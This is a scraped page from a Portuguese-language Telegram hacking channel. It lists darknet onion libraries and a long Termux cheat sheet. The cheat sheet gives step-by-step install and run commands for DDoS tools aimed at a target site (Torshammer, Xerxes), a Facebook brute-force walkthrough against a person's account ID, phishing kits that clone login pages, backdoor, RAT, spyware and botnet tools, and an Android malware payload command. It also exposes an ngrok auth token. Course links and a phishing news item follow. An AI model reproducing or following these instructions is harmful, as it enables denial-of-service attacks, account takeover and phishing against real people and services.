Ruby Of Security
1.24K subscribers
150 photos
9 videos
113 files
1.02K links
Here you will find content like:

🌎 Notícias | 📡 Tecnologia | 🌐Hacking
📚 Cursos | Ferramentas | 📝Tutoriais

@DARKNET_BR
@TIdaDepressaoOficial
@ExploitHub
@AcervoDoSam

Acervo:@AcervoRubyOfSec

Group:@RubyOfSecGroup

© Ruby Of Security - 2014 - 2019
Download Telegram
Forwarded from DARKNET BR
🗂 #Links #Library #DarkNet

@DARKNET_BR
Forwarded from DARKNET BR
📚 Hackerplace
Forwarded from DARKNET BR
📚 Index of Library

http://52wdeibt3ivmcapq.onion/contents.html
Forwarded from DARKNET BR
📚 Index of Library

http://libraryqtlpitkix.onion/library/
Forwarded from DARKNET BR
📚 Imperial Library

http://xfmro77i3lixucja.onion/
Forwarded from DARKNET BR
📚 Calibre Library

http://pepaieloghlblocc.onion/mobile
(Apt list) (chmod +x .sh) (python.py)

|~°•°~°•°~°•°~°•°~°•°~°•°~°•°~°•°~°•°~|

Comandos básicos de Termux:

Comando; apt update
Comando; apt upgrade
Comando; termux-setup-storage
Comando; cd (storage)
Comando; ls
Comando; cd /sdcard/Download/
*(Mover arquivo para o Termux)
Comando; cd /sdcard/Download/(arquivo) $HOME
Comando; pwd (indicar a pasta atual)
Comando; cd /data/data/com.termux/files/home/
Comando; unzip (arquivo)
*(Copiar e mandar)
Comando; cp (arquivo) /data/data/com.termux/usr/bin/
Comando; cd /data/data/com.termux/usr/bin/
Comando; cd /data/data/com.termux/files/home/
*(Remover arquivos)
Comando; rm -r (arquivo)
Comando; cd .. (retroceder pasta)
*(Regressar a pasta home Termux)
Comando; cd /data/data/com.termux/files/home/
*(Abrir sessão nova)
Comando; [CTRL e ALT+c]
Comando; exit ou [CTRL+d] e enter pra ambos (eliminar sessão)
*(Instalar pacotes)
Comando; apt install (pacote)
Comando; apt list (listar pacotes)
*(abrir pagina com termux)
Comando; termux-open (site)
Comando; dpkg --print-architecture (Arquitetura)
Comando; ifconfig (informações)
python3 --version
touch .hushlogin remover banner
screenfetch mostra as configurações do celular tipo modelo da ram/gpu etc...
_________________________________

Pacote de Ferramentas:

apt install git
apt update
apt upgrade
git clone https://github.com/3xploit666/packtermux
cd packtermux
chmod 755 * scriptpack.sh
sh scriptpack.sh
_________________________________

Lazymux:

apt install python2
apt install git
apt update
git clone https://github.com/Gameye98/Lazymux
ls
cd lazymux
ls
python2 lazymux.py
_________________________________

Tool-X:

apt update
apt install git
git clone https://github.com/Rajkumrdusad/Tool-X
cd Tool-X
chmod +x install.aex
sh install.aex (if not work than type) ./install.aex
(y)
Enter
Clear
Tool-X
_________________________________

Setoolkit(pishing):

pkg update
pkg upgrade
pkg install python
pkg install python2
git clone https://github.com/trustedsec/social-engineer-toolkit && cd social-engineer-toolkit

python setup.py instala o 
setoolkit

Atualização: 
mestre de origem git pull

sudo ./setup.py instala 
setoolkit

_________________________________

Brutal:

apt update
apt install git
git clone http://github.com/Screetsec/Brutal
ls
cd Brutal
ls
chmod +x Brutal.sh
./Brutal.sh
_________________________________

RED HAWK:

pkg install git
pkg install php
pkg update
git clone https://github.com/Tuhinshubhra/RED_HAWK
cd RED_HAWK
chmod +x rhawk.php
php rhawk.php
Rhawk: (site)
Rhawk: 1
_________________________________

NMap:

pkg install nmap
pkg update
nmap
nmap -v -A (IP da rede,site)
2° ping (site) = (IP da rede)
_________________________________

Xshell:

pkg install python
pkg install php
pkg install Git
pkg update
pkg upgrade
git clone https://github.com/Ubaii/Xshell
cd Xshell
python xshell.py
_________________________________

Routersploit:

-apt install python2
-apt install git
-python3 --version
-apt update
-apt upgrade
-git clone https://github.com/threat9/routersploit.git
-cd routersploit
-pip3 install -r requirements.txt
-pip3 install -r requirements-dev.txt
-pip3 install requests
-pip3 install future
-python3 rsf.py
rsf> show all
rsf> use (module/module/module_mod)
rsf> back (sair do módulo)
_________________________________

Airgeddon:

-cd termux-ubuntu
-./start-ubuntu.sh
# apt-get update
# apt-get install git
# git clone https://github.com/v1s1t0r1sh3r3/airgeddon
# ls
# cd airgeddon
# ls
# chmod +x airgeddon.sh
Enter
Enter
# apt-get install net-tools
# ./airgeddon.sh
# apt-get install aircrack-ng
_________________________________

Torshammer:

apt install python2
apt install tor
apt install git
apt update
apt upgrade
git clone https://github.com/dotfighter/torshammer
cd torshammer
python2 torshammer.py
Torshammer: python2 torshammer.py -t (target site) -r 256 -p (port)
_________________________________

Hunner:

-pkg install python
-pkg install git
-pkg update
-git clone https://github.com/b3-v3r/Hunner
-ls
-cd Hunner
-chmod 777 hunner.py
-python hunner.py
___
______________________________

IPGeoLocation:

1- pkg install python
2- pkg install git
3- pkg update
4- git clone https://github.com/maldevel/IPGeolocation
5- cd IPGeoLocation
6- pip2 install -r requirements.txt
7- easy_install-3.6 termcolor
8- ./ipgeolocation.py -t (IP)
9- dar enter
_________________________________

Planetwork-DDOS:

apt install git python2
apt update
(Lazymux)
cd Planetwork-DDOS
python2 pntddos.py
pntddos.py <ip> <port> <packet>
_________________________________

Hydra:

-apt install hydra
-hydra

Black Hydra:

apt update
apt upgrade
apt install python
apt install python2
apt install git
git clone https://github.com/Gameye98/Black-Hydra
cd Black-Hydra
chmod +x blackhydra.py
python2 blackhydra.py
_________________________________

Facebook Brute Force:

apt update
ls
cd Lazymux
ls
python2 lazymux.py
04
02
ls
cd facebook-brute
ls
pwd (mais pra frente copia e cola em PASSWORD) + (/password.txt)
python2 facebook.py
id da pessoa
copia o diretorio
/password.txt
_________________________________

Blackbox:

pkg install python2 wget
wget https://raw.githubusercontent.com/jothatron/blackbox/master/blackbox.py
pip2 install requests pexpect passlib python2 blackbox.py -h
_________________________________

Netaattack:

-cd termux-ubuntu
-./start-ubuntu.sh
# apt install python
# apt install git
# git clone https://github.com/chrizator/netattack
# cd netattack
# apt-get install python-nmap python-argparse python-scapy iw
# chmod +x netattack.py
# ./netattack.py
_________________________________

Metasploit:

(Metasploit-Framework) 1°
$termux-setup-storage
$apt update
$apt upgrade
$apt install curl then type command $curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
$ls
$chmod 777 metasploit.sh
$sh metasploit.sh
$cd metasploit-framework
$./msfconsole

(Metasploit.sh) 2°
1° termux-setup-storage
2° apt install update e upgrade
3° apt install curl
4° curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
5° chmod +x metasploit.sh
6° ./metasploit.sh (instalação)
7°msfconsole

pkg install wget
wget https://Auxilus.github.io/metasploit.sh
bash metasploit.sh
_________________________________

SCANNER-INURL:

pkg install git
$ pkg install php
$ git clone https://github.com/googleinurl/SCANNER-INURLBR
$ cd SCANNER-INURLBR
$ ls
$ chmod +x inurlbr.php
clear
$ php inurlbr.php
$ php inurlbr.php --help
_________________________________

SQLscan:

pkg install php
pkg install git
pkg install update
git clone https://github.com/Cvar1984/sqlscan
cd sqlscan
chmod +x sqlscan.php
php sqlscan.php
_________________________________

BruteXSS:

apt upgrade
apt update
apt install python2
apt install git
git clone https://github.com/shawarkhanethicalhacker/BruteXSS
cd BruteXSS && ls
python2 brutexss.py
_________________________________

Termux-sudo:

apt instalar git
git clone https://github.com/Bhai4You/Termux-Sudo
cd Termux-Sudo
chmod +x sudo.sh
bash sudo.sh
_________________________________

A-Rat:

pkg install python2
pkg install git
pkg install update
pkg install upgrade
git clone https://github.com/Xi4u7/A-Rat
cd A-Rat
Python2 A-Rat.py
help
_________________________________

Weeman (pishing):

apt update
apt install git
apt install python2
git clone https://github.com/evait-security/weeman
cd weeman
python2 weeman.py
show
set url (link do site que deseja clonar)
set action_url (ex:http://facebook.com/login)
Run
2° terminal:
./ngrok http 8080
_________________________________

SqlMap:

git clone https://github.com/sqlmapproject/sqlmap
cd sqlmap
ls
chmod +x sqlmap.py
ls
chmod +x sqlmapapi.py
python2 sqlmap.py
_________________________________

Recon Dog:

-apt install git
-apt install python2
-apt update
-git clone https://github.com/s0md3v/ReconDog
-cd ReconDog
-chmod +x dog.py
-python2 dog.py
_________________________________

Hakku Framework:

apt-get upgrade
3.apt install python
4.apt install python2
5.apt install git
6 gith
ub link
git clone https://github.com/4shadoww/hakkuframework
7.ls
8.cd hakkuframework
9.ls
10.python hakku
Hakku: show modules
Hakku: use mtm
_________________________________

wifi-hacker:

pkg install git
pkg update
pkg upgrade
git clone https://github.com/esc0rtd3w/wifi-hacker
cd wifi-hacker
chmod +x wifi-hacker.sh
./wifi-hacker.sh
_________________________________

wifite:

pkg install python2
pkg install git
pkg install update
pkg install upgrade
git clone https://github.com/derv82/wifite
cd wifite
python2 wifite.py
_________________________________

Arch Linux: 3°

-apt install proot
-apt install wget
-apt update
-git clone https://github.com/sdrausty/termux-archlinux
-cd termux-archlinux
-chmod +x setupTermuxArch.sh
-sh setupTermuxArch.sh
_________________________________

Tor:

-apt install tor
-tor
_________________________________

Ngrok:

-cd /sdcard/download
-unzip ngrok-stable-linux-arm.zip
-mv ngrok /$HOME
-cd
-ls
-chmod +x ngrok
-ls
-mv ngrok ../usr/bin

(./ngrok authtoken 7RRhX9hin9LZgkL1xffYk_6anhAxfDtBpyquG4LZrKW) - Fezex

-./ngrok http 8080
_________________________________

Xerxes:

apt update
apt install git
apt install clang
git clone https://github.com/zanyarjamal/xerxes
ls
cd xerxes
ls
clang xerxes.c -o xerxes
ls
./xerxes (Nome do site do atk) 80
_________________________________

Ubuntu: 2°

$ apt install git
$ apt install proot
$ apt install wget
$apt update
$ git clone https://github.com/Neo-Oli/termux-ubuntu
$ cd termux-ubuntu
$ ls
$ chmod +x ubuntu.sh
$ sh ubuntu.sh
$ ./start-ubuntu.sh
_________________________________

Nano editor:

-apt install nano
_________________________________

Clang:

Apt ou pkg install clang
_________________________________

PHP:

$ apt update
$ apt upgrade
$ apt install php
$ apt install nano
$ nano hello.php
# To Run PHP script Type :-
<?php
echo "Hello World!";
echo "\n PHP in Android...\n";
?>
CTRL+O (salvar)enter
CTRL+X (sair)
$ php hello.php
_________________________________

termux-lazysqlmap:

apt install python2
apt install git
apt update
git clone https://github.com/verluchie/termux-lazysqlmap
ls
cd termux-lazysqlmap
unzip lazysqlmap.zip
chmod 777 install.sh
./install.sh
_________________________________

Termux-Fedora: 1°

-apt install proot
-apt install wget
-apt update
-git clone https://github.com/nmilosev/termux-fedora
-cd termux-fedora
-chmod 777 termux-fedora.sh
-sh termux-fedora.sh f26_arm
-startfedora
Fedora@$ dnf update
_________________________________

Ruby(gem): 3°

-apt install ruby
_________________________________

Nokogiri, bundle, bundler, gemfile: 4°

-cd metasploit.sh
-gem install bundle
-gem install bundler
-pip2 install bundler
-bundle install -j5
-bundle update
-bundle update nokogiri
-./msfconsole
-gem install nokogiri -- --use-system-libraries
-error nokogiri version 1.8.2 :
-gem install nokogiri -v'1.8.2' -- --use-system-libraries
_________________________________

Beef:

apt update
apt install nano
cd $PREFIX/etc/apt
mkdir -p sources.list.d
cd sources.list.d
touch hax4us.list
nano hax4us.list
architecture arm deb [trusted=yes arch=all,arm] https://hax4us.github.io/termux-tools/ termux extras
apt install beef-xss
beef
_________________________________

Cupp Wordlist:

apt update
apt install python2
apt install git
git clone https://github.com/Mebus/cupp
cd cupp
python2 cupp.py -i
_________________________________

Admin painel finger:

$apt upgrade
$apt update
$apt install git
$apt install python2
$git clone https://github.com/bdblackhat/admin-panel-finder
$ls
$cd admin-panel-finder
$ls
$python2 admin_panel_finder.py
_________________________________

Websploit: (MITM)

-apt update
-apt install git
-apt install python2
-git clone https://github.com/websploit/websploit
-cd websploit
-chmod +x websploit wsf-update.py
-pip2 install scapy
-python2 websploit
wsf > show modules ou help
_________________________________

D-tech:

apt update
apt install python2
apt install git
git clone https:/
/github.com/shawarkhanethicalhacker/D-TECT
ls
cd D-TECH
pip2 install beaultifulSoup
pip2 instal colorama
python2 d-tech.py
_________________________________

Recon-NG:

-apt install git
-apt install python2
-apt update
-apt upgrade
-git clone https://github.com/Techzindia/recon-ng_termux_by_viral
-cd recon-ng_termux_by_viral
-unzip recon-ng.zip
-cd recon-ng
-chmod +x recon-ng
-python2 recon-ng
-python2 recon-ng --no-check
> help
> show modules
> use (modules)
> show options
> set SOURCE (site)
> run
_________________________________

Kali-Nethunter:

-apt install git
-apt update
-git clone https://github.com/Hax4us/Nethunter-In-Termux
-cd Nethunter-In-Termux
-chmod +x kalinethunter
-./kalinethunter
_________________________________

Bull-attack:

apt install python
apt install python2
apt install git
git clone https://github.com/Bhai4You/Bull-Attack
ls
cd Bull-Attack
ls
chmod +x B-attack.py
ls
python2 B-attack.py
_________________________________

Ip-attack:

apt update
apt upgrade
apt install git
apt install python
apt install python2
cd $HOME
git clone https://github.com/Bhai4You/Ip-Attack
cd Ip-Attack
chmod +x requirement.sh ip-attack.py bash requirement.sh
python2 ip-attack.py
_________________________________

Devploit:

apt update
apt install git
apt install python2
git clone https://github.com/joker25000/Devploit
cd Devploit
chmod 777 Devploit.py
python2 Devploit.py
_________________________________

Botnet:

pkg install git
pkg install php
git clone https://github.com/cvar1984/Kawai-Botnet
cd Kawai-Botnet
php kawai.php
_________________________________

Weevely(Backdoor):

apt update
apt install python2
apt install git
git clone https://github.com/glides/Weevely
cd Weevely
python2 weevely.py
_________________________________

Tmux-Bunch (Backdoor apk):

git clone https://github.com/Hax4us/Tmux-Bunch
cd Tmux-Bunch
chmod +x setup
chmod +x tmuxbunch
sh setup.sh
sh tmuxbunch.sh
_________________________________

Shelpy(Backdoor):

git clone https://github.com/yurijuliano11tx/shelpy
python3 --version
cd shelpy
python3 shelpy
_________________________________

Social Fish:

pkg install python2 php curl git
pip2 install wget
git clone https://github.com/Lexiie/SocialFish cd SocialFish
chmod +x *
pkg install grep
python2 SocialFish.py
_________________________________

Nikto:

git clone https://github.com/sullo/nikto
ls
cd nikto
ls
cd program
ls
pkg install perl
perl nikto.pl
_________________________________

Shodan:

apt update && apt upgrade
python3 --version
easy_install shodan
pip3 install shodan request
shodan init (SUA KEY DE ATIVAÇÃO) shodan -h
_________________________________

Linu-packs:

git clone https://github.com/Tioolive/Linu-packs
cd Linu-packs
./linu.py
_________________________________

Breacher (painel de acesso qqr site):

apt update && apt upgrade
apt install git
apt install python2
git clone https://github.com/s0md3v/Breacher
cd Breacher
python2 breacher.py
-u site.com --type php --fast
_________________________________

TxTool:

git clone https://github.com/kuburan/txtool
cd txtool
./install.py
txtool
_________________________________

A2sv(vulnerabilidade SSL):

git clone https://github.com/hahwul/a2sv
cd a2sv
pip2 install -r requirements.txt
python2 a2sv.py
_________________________________

Heartbleed(SSL):

git clone https://github.com/TechnicalMujeeb/HeartBleed
cd HeartBleed
chmod +x*
./install.sh
./hbleed
_________________________________

Perpext

git clone https://github.com/pexpect/pexpect.git
2>cd pexpect
3>python setup.py install
_________________________________

Darksploit: (vírus)

pkg update
pkg install python2
pkg install git
git clone https://github.com/LOoLzeC/DarkSploit cd DarkSploit
cd Install
sh installtermux.sh
pip install -r requirements.txt
python2 DrXp.py

Comandos exemplos...
make virus/on_android_malware_door
Run
_________________________________

Ghostdroid: (spyware)

apt install git
git clone https://github.com/GhosTmaNHarsh/Gho
st-Droid
cd Ghost-Droid
chmod 777 setup.sh
./setup.sh
./ghost-droid
_________________________________

Zarp: (Scan, Dos attack, sniffers)

git clone https://github.com/hatRiot/zarp
cd zarp
pip2 install -r requirements.txt
pkg install tcpdump
sudo python2 zarp.py
_________________________________


🌍@RubyOfSec
Programação, Redes, Engenharia de Software, Tecnicas de Invasão, Criptografia, Quimica, Medicina e etc:
https://mega.nz/#F!hwVDTZiC!Toc9ScaKdJfYGTgYvclRYw!cxdBEKTL
https://mega.nz/#F!KIRE3DDS!RSwncUf5rVV_RZ_GLu-ccA!GYgRDYIT

Redes IPV6:
https://mega.nz/#F!9FtBVCrT!qIXB1mdazoD5zf33Z7bCNg!0R1WWKqS

Imagens de Sistemas Operacionais como Windows 7, Xp e Linux para laboratório:
https://mega.nz/#F!L01gBbhI!0rQjeFeMWPgD9NwwZnGhmw

Curso de inglês Mario Vergara:
https://mega.nz/#F!bkgH2YwY!kI4uMzHuD_nUpEn12zMZfA

Curso redes de computadores Gratuito:
https://www.udemy.com/redes-de-computadores-comeca…/learn/…/

Curso Redes de Computadores e Internet:
https://www.udemy.com/redes-de-computadores-e-a-internet/

Linux by Brandon Carter:
https://mega.nz/#F!UJ8glBwb!tAipv9S9g4sZTljqD27FXA

Redes by Brandon Carter:
https://mega.nz/#F!9FtBVCrT!qIXB1mdazoD5zf33Z7bCNg

Programação by Brandon Carter:
https://mega.nz/#F!zIV0wAqa!NLQ1tL4MIXAvihXDzKhoNg

Segurança by Brandon Carter:
https://mega.nz/#F!hdMykAiT!6SBQwivXCDWOY4EZDBL5WQ

Curso Lógica da Programação e ainda ensina C E C++:
https://www.udemy.com/c-e-c-fundamentos-para-logica-de-pro…/

Curso Lógica da Programação em Espanhol:
https://www.udemy.com/logica-programacion-aprende-programa…/

Ethical Hacking Buffer Overflow:
https://www.udemy.com/ethical-hacking-stack-buffer-overflo…/

Binário aulinha:
https://www.youtube.com/watch?v=-5Ekz7KgEp8

Hexadecimal aulinha:
https://www.youtube.com/watch?v=6bli5PKoP3o

Buffer Overflow Ricardo:
https://www.youtube.com/watch?v=59_gjX2HxyA

3 Faces do Crime Cibernético:
https://www.youtube.com/watch?v=W5uJE8LsBxM&t=1s

Aula de Criptografia:
https://www.youtube.com/watch?v=cWld3rMD7Wk

Curso iptables com Linux:
https://www.udemy.com/firewall-linux-com-iptables/

Curso de Linux pago 25 conto, mas vale a pena!
https://www.udemy.com/curso-online-certificacao-linux-lpic1-comptia/
Site livre para testar o seu conhecimento.

Link: http://www.vinycalce.com.br/

Site para Capture The Flag, existe só uma flag. A pessoa que conseguir achar o Flag, ganha como recompensa o site, obtendo todo o acesso.
Novo golpe usa e-mail falso dos Correios para instalar malware em PCs

Um novo golpe utilizando o nome dos Correios circula na Internet. De acordo com a empresa de segurança Trend Micro, criminosos estão distribuindo um malware através de e-mails falsos sobre entregas de encomendas. Trata-se de uma tentativa de phishing, na qual bandidos usam softwares falsos para roubar informações dos usuários.

Segundo a Trend Micro, o falso e-mail contendo o malware apresenta uma mensagem sobre uma tentativa malsucedida de entrega no endereço do usuário. Ao clicar no link da mensagem, a pessoa é levada a uma página onde será feito um download de um arquivo compactado no formato ZIP. A infecção ocorrerá caso o usuário abra o ficheiro baixado.

🌍@RubyOfSec

Fonte: https://olhardigital.com.br/fique_seguro/noticia/novo-golpe-usa-e-mail-falso-dos-correios-para-instalar-malware-em-pcs/79665
Introdução à Segurança da Informação


Curso grátis sobre a segurança da informação criado pela eSecurity.

Enjoy :)

https://esecurity.com.br/cursos/introducao-a-seguranca-da-informacao/

🌎@RubyOfSec
A Equipe da Life4Sec está ajudando a divulgar a RoadSec 2018SP.

Este codigo abaixo te dá direito a inscrição com 10% de desconto!!! Só usar o código abaixo na hora da compra.
CÓDIGO: PMRDDC-JMBRZS
Robber - Ferramenta para encontrar arquivos executáveis ​​propensos ao sequestro de DLL


Robber é uma ferramenta gratuita de código aberto desenvolvida usando o Delphi XE2 sem dependências de terceiros.
O que é o seqüestro de DLL?
O Windows tem um caminho de pesquisa para DLLs em sua arquitetura subjacente. Se você puder descobrir quais DLLs um executável solicita sem um caminho absoluto (acionando esse processo de pesquisa), você pode colocar sua DLL hostil em algum ponto mais alto no caminho de pesquisa, de modo que ela seja encontrada antes da versão real e o Windows Alimente seu código de ataque ao aplicativo.


🌍@RubyOfSec

https://www.kitploit.com/2018/11/robber-robber-is-open-source-tool-for.html